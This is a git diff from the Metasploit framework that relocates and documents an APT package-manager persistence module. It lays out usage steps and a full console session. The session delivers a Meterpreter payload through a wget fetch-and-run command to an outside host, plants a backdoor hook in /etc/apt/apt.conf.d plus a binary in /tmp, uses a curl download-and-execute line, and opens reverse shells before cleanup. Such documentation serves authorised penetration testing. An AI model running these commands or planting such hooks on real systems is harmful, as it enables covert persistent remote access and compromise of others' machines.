rapid7
diff --git a/‎documentation/modules/exploit/linux/local/apt_package_manager_persistence.md‎
Lines changed: 0 additions & 66 deletions b/‎documentation/modules/exploit/linux/local/apt_package_manager_persistence.md‎
Lines changed: 0 additions & 66 deletions
diff --git a/‎documentation/modules/exploit/linux/persistence/apt_package_manager.md‎
Lines changed: 138 additions & 0 deletions b/‎documentation/modules/exploit/linux/persistence/apt_package_manager.md‎
Lines changed: 138 additions & 0 deletions
diff --git a/‎modules/exploits/linux/local/apt_package_manager_persistence.rb‎
Lines changed: 0 additions & 103 deletions b/‎modules/exploits/linux/local/apt_package_manager_persistence.rb‎
Lines changed: 0 additions & 103 deletions
@@ -0,0 +1,138 @@
+## Vulnerable Application
+
+This module will run a payload when the apt package manager is used.
+This module creates a pre-invoke hook for APT in `apt.conf.d`.
+The hook name syntax is numeric followed by text.
+
+Verified on Ubuntu 22.04
+
+## Verification Steps
+
+1. Exploit a box that uses APT
+2. Obtain root persmissions, or enough permissions to edit the `apt.conf.d` folder
+3. `use exploit/linux/persistence/apt_package_manager`
+4. `set SESSION <id>`
+5. `set PAYLOAD cmd/unix/reverse_python` configure the payload as needed
+6. `exploit`
+
+When the system runs `apt-get update` the payload will launch.
+
+## Options
+
+### PAYLOAD_NAME
+
+Name of backdoor executable. Defaults to a random name
+
+### HOOKNAME
+
+Name of pre-invoke hook to be installed in `/etc/apt/apt.conf.d/`. Pre-invoke hook name syntax is numeric followed by text.
+
+## Scenarios
+
+### Tested on Ubuntu 22.04
+
+Initial access vector via web delivery
+
+```
+$ ./msfconsole -q
+[*] Processing /root/.msf4/msfconsole.rc for ERB directives.
+resource (/root/.msf4/msfconsole.rc)> setg verbose true
+verbose => true
+resource (/root/.msf4/msfconsole.rc)> setg lhost 111.111.1.111
+lhost => 111.111.1.111
+resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
+[*] Using configured payload python/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> set srvport 8181
+srvport => 8181
+resource (/root/.msf4/msfconsole.rc)> set target 7
+target => 7
+resource (/root/.msf4/msfconsole.rc)> set payload payload/linux/x64/meterpreter/reverse_tcp
+payload => linux/x64/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> set lport 4545
+lport => 4545
+resource (/root/.msf4/msfconsole.rc)> set URIPATH l
+URIPATH => l
+resource (/root/.msf4/msfconsole.rc)> run
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+[*] Starting persistent handler(s)...
+[*] Started reverse TCP handler on 111.111.1.111:4545 
+[*] Using URL: http://111.111.1.111:8181/l
+[*] Server started.
+[*] Run the following command on the target machine:
+wget -qO Z73D1DUW --no-check-certificate http://111.111.1.111:8181/l; chmod +x Z73D1DUW; ./Z73D1DUW& disown
+[msf](Jobs:1 Agents:0) exploit(multi/script/web_delivery) > 
+[*] 222.222.2.22     web_delivery - Delivering Payload (250 bytes)
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3045380 bytes) to 222.222.2.22
+[*] Meterpreter session 1 opened (111.111.1.111:4545 -> 222.222.2.22:51076) at 2025-02-04 17:40:52 -0500
+sessions -l
+Active sessions
+===============
+  Id  Name  Type                   Information          Connection
+  --  ----  ----                   -----------          ----------
+  1         meterpreter x64/linux  root @ 222.222.2.22  111.111.1.111:4545 -> 222.222.2.22:51076 (222.222.2.22)
+```
+
+Persistence
+
+```
+[msf](Jobs:1 Agents:1) exploit(multi/script/web_delivery) > use exploit/linux/persistence/apt_package_manager 
+[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
+[msf](Jobs:1 Agents:1) exploit(linux/persistence/apt_package_manager) > set session 1
+session => 1
+[msf](Jobs:1 Agents:1) exploit(linux/persistence/apt_package_manager) > check
+[*] The target appears to be vulnerable. /etc/apt/apt.conf.d/ and /tmp/ are writable, also found apt-get.
+[msf](Jobs:1 Agents:1) exploit(linux/persistence/apt_package_manager) > exploit
+[*] Command to run on remote host: curl -so ./xTOLdQoOTv http://111.111.1.111:8080/Hg3DGEu9GqlWD06kh4AzFg;chmod +x ./xTOLdQoOTv;./xTOLdQoOTv&
+[*] Exploit running as background job 1.
+[*] Exploit completed, but no session was created.
+[msf](Jobs:2 Agents:1) exploit(linux/persistence/apt_package_manager) > 
+[*] Fetch handler listening on 111.111.1.111:8080
+[*] HTTP server started
+[*] Adding resource /Hg3DGEu9GqlWD06kh4AzFg
+[*] Started reverse TCP handler on 111.111.1.111:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. /etc/apt/apt.conf.d/ and /tmp/ are writable, also found apt-get.
+[*] Attempting to write hook:
+[*] Wrote /etc/apt/apt.conf.d/76skoGqswo
+[*] Backdoor uploaded /tmp/erNOJV96u
+[+] Backdoor will run on next APT update
+[*] Meterpreter-compatible Cleaup RC file: /root/.msf4/logs/persistence/222.222.2.22_20250204.4245/222.222.2.22_20250204.4245.rc
+[msf](Jobs:2 Agents:1) exploit(linux/persistence/apt_package_manager) > jobs
+Jobs
+====
+  Id  Name                                            Payload                                     Payload opts
+  --  ----                                            -------                                     ------------
+  0   Exploit: multi/script/web_delivery              linux/x64/meterpreter/reverse_tcp           tcp://111.111.1.111:4545
+  1   Exploit: linux/persistence/apt_package_manager  cmd/linux/http/x64/meterpreter/reverse_tcp  tcp://111.111.1.111:4444
+[msf](Jobs:2 Agents:1) exploit(linux/persistence/apt_package_manager) > 
+```
+
+Run `sudo apt-get update` on the target.
+
+```
+[*] Client 222.222.2.22 requested /Hg3DGEu9GqlWD06kh4AzFg
+[*] Sending payload to 222.222.2.22 (curl/7.81.0)
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3045380 bytes) to 222.222.2.22
+[*] Meterpreter session 2 opened (111.111.1.111:4444 -> 222.222.2.22:49804) at 2025-02-04 17:43:06 -0500
+[msf](Jobs:2 Agents:2) exploit(linux/persistence/apt_package_manager) > sessions -i 2
+[*] Starting interaction with 2...
+(Meterpreter 2)(/tmp) > sysinfo
+Computer     : 222.222.2.22
+OS           : Ubuntu 22.04 (Linux 5.15.0-48-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+(Meterpreter 2)(/tmp) > 
+```
+
+#### Cleanup
+
+```
+(Meterpreter 2)(/tmp) > resource /root/.msf4/logs/persistence/222.222.2.22_20250204.4245/222.222.2.22_20250204.4245.rc
+[*] Processing /root/.msf4/logs/persistence/222.222.2.22_20250204.4245/222.222.2.22_20250204.4245.rc for ERB directives.
+resource (/root/.msf4/logs/persistence/222.222.2.22_20250204.4245/222.222.2.22_20250204.4245.rc)> rm /etc/apt/apt.conf.d/76skoGqswo
+resource (/root/.msf4/logs/persistence/222.222.2.22_20250204.4245/222.222.2.22_20250204.4245.rc)> rm /tmp/erNOJV96u
+```